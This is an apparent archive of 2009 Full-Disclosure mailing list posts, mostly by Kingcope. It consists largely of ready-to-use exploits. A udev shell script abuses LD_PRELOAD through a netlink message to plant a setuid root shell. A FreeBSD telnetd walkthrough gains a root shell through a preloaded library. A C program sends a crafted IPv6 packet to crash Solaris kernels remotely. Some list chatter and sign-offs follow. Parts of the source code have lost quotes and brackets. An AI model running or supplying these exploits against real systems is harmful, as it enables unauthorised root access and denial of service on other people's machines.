[Full-disclosure] udev exploit
(see attached)
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat udev.c _EOF
#include fcntl.h
#include stdio.h
#include string.h
#include stdlib.h
#include unistd.h
#include dirent.h
#include sys/stat.h
#include sysexits.h
#include wait.h
#include signal.h
#include sys/socket.h
#include linux/types.h
#include linux/netlink.h
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, add);
sprintf(subsystem, block);
sprintf(sysfspath, /dev/foo);
sprintf(major, 8);
sprintf(minor, 1);
memset(address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, %...@%s, event, sysfspath) +1;
mp += sprintf(mp, ACTION=%s, event) +1;
mp += sprintf(mp, DEVPATH=%s, sysfspath) +1;
mp += sprintf(mp, MAJOR=%s, major) +1;
mp += sprintf(mp, MINOR=%s, minor) +1;
mp += sprintf(mp, SUBSYSTEM=%s, subsystem) +1;
mp += sprintf(mp, LD_PRELOAD=/tmp/libno_ex.so.1.0) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, msg, 0);
close(socket_fd);
sleep(10);
execl(/tmp/suid, suid, (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat program.c _EOF
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init()
{
setgid(0);
setuid(0);
unsetenv(LD_PRELOAD);
execl(/bin/sh,sh,-c,chown root:root /tmp/suid; chmod +s
/tmp/suid,NULL);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat suid.c _EOF
int main(void) {
setgid(0); setuid(0);
execl(/bin/sh,sh,0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] udev exploit - SECURITYFOCUS.COM edits your exploits
Hello people for some reason someone on securityfocus.com thinks he or she´s a genuis. The exploit at http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2009-04/msg00204.html and http://downloads.securityfocus.com/vulnerabilities/exploits/34536.sh differ so much that the exploit is even not compilable. Look at the inserted EOF's .. Dirty little security industry. Use the exploit at full disclosure and forget about the other. Cherrio, kcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD zeroday
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.
There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.
The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.
Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init() {
FILE *f;
setenv(LD_PRELOAD, , 1);
system(echo ALEX-ALEX;/bin/sh);
}
---snip-
Then we compile this stuff.
---snip-
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-
Then we copy the file to a known location (local root exploit)
---snip-
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-
...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.
---snip-
#telnet
auth disable SRA
environ define LD_PRELOAD /tmp/libno_ex.so.1.0
open target
---snip-
ALEX-ALEX
#ROOTSHELL
This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.
Signed,
Kingcope[nikolaos rangos]/2009
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Solaris Devs Are Smoking Pot
Regards,
2009/Kingcope
/*
SunOS Release 5.11 Version snv_101b Remote IPV6
Kernel Crash Exploit 0day
By Kingcope/2009
*/
#include stdio.h
#include string.h
#include stdlib.h
#include netinet/in.h
#include netdb.h
#include sys/time.h
#include sys/types.h
#include sys/socket.h
#include arpa/inet.h
#include unistd.h
unsigned char rawData[] =
\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58
\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00
\x02\x0c\x29\xff\xfe\xf1\x1e\xbb;
int main(int argc, char *argv[])
{
struct sockaddr_in6 dst;
int s;
if (argc 2)
{
printf(SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n);
printf(Usage: %s dst\n, *argv);
return(1);
}
memset(dst, 0, sizeof(dst));
if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) dst.sin6_addr) != 1) {
printf(Error: inet_pton()\n);
exit(-1);
}
memcpy(rawData+24, dst.sin6_addr, 16);
dst.sin6_family = AF_INET6;
s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf(Sending IPV6 packet: %s\n, argv[1]);
if (sendto(s,rawData,sizeof(rawData),0,(struct sockaddr*)dst,sizeof(dst)) == -1)
{
perror(Error sending packet);
exit(-1);
}
return(0);
}
/*
Kernel Crash Dump May Look Like The Following Snippet
[ID 965332 kern.notice] ipsec_needs_processing_v6
[ID 10 kern.notice]
[ID 655072 kern.notice] ff00012b9650 ip:ipsec_needs_processing_v6+10c ()
[ID 655072 kern.notice] ff00012b96f0 ip:ipsec_early_ah_v6+75 ()
[ID 655072 kern.notice] ff00012b9860 ip:ip_rput_data_v6+f4e ()
[ID 655072 kern.notice] ff00012b9940 ip:ip_rput_v6+64e ()
[ID 655072 kern.notice] ff00012b99b0 unix:putnext+21e ()
[ID 655072 kern.notice] ff00012b9a00 dld:dld_str_rx_fastpath+8a ()
[ID 655072 kern.notice] ff00012b9ad0 dls:i_dls_link_rx+2c7 ()
[ID 655072 kern.notice] ff00012b9b50 mac:mac_do_rx+b7 ()
[ID 655072 kern.notice] ff00012b9b80 mac:mac_rx+1f ()
[ID 655072 kern.notice] ff00012b9bd0 e1000g:e1000g_intr+135 ()
[ID 655072 kern.notice] ff00012b9c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012b9c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff00012c5870 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff00012c58c0 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff00012c58d0 unix:cmnint+ba ()
[ID 655072 kern.notice] ff00012c5a00 unix:ddi_mem_putb+f ()
[ID 655072 kern.notice] ff00012c5a40 ata:ata_disk_start_dma_out+88 ()
[ID 655072 kern.notice] ff00012c5a90 ata:ata_ctlr_fsm+1fb ()
[ID 655072 kern.notice] ff00012c5af0 ata:ata_hba_start+84 ()
[ID 655072 kern.notice] ff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()
[ID 655072 kern.notice] ff00012c5ba0 ata:ghd_intr+8d ()
[ID 655072 kern.notice] ff00012c5bd0 ata:ata_intr+27 ()
[ID 655072 kern.notice] ff00012c5c20 unix:av_dispatch_autovect+7c ()
[ID 655072 kern.notice] ff00012c5c60 unix:dispatch_hardint+33 ()
[ID 655072 kern.notice] ff0001205ab0 unix:switch_sp_and_call+13 ()
[ID 655072 kern.notice] ff0001205b00 unix:do_interrupt+9e ()
[ID 655072 kern.notice] ff0001205b10 unix:cmnint+ba ()
[ID 655072 kern.notice] ff0001205c00 unix:mach_cpu_idle+b ()
[ID 655072 kern.notice] ff0001205c40 unix:cpu_idle+17b ()
[ID 655072 kern.notice] ff0001205c60 unix:idle+4c ()
[ID 655072 kern.notice] ff0001205c70 unix:thread_start+8 ()
[ID 10 kern.notice]
[ID 672855 kern.notice] syncing file systems...
[ID 904073 kern.notice] done
[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel
[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,
[ID 851671 kern.notice] dump succeeded
[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit
[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved.
*/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pwnie Awards 2008
OOPS!: By question I landed on the Server Side Bug Nomination List Again. Thanks for riding this Ceremony. kcope / eliteb0y / Nikos OOPS I did it again (fool(disclosure)) 2008/7/21 David Litchfield [EMAIL PROTECTED]: Hey Alexandr, I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd be more than happy to - after all one bug over 3 years means someone did a really good job ;) Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFK from full-disclosure
I am reachable 0nly @ two addresses from now on: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFK from fool-disclosure
I am reachable 0nly @ two addresses: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v Signed, KingCope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
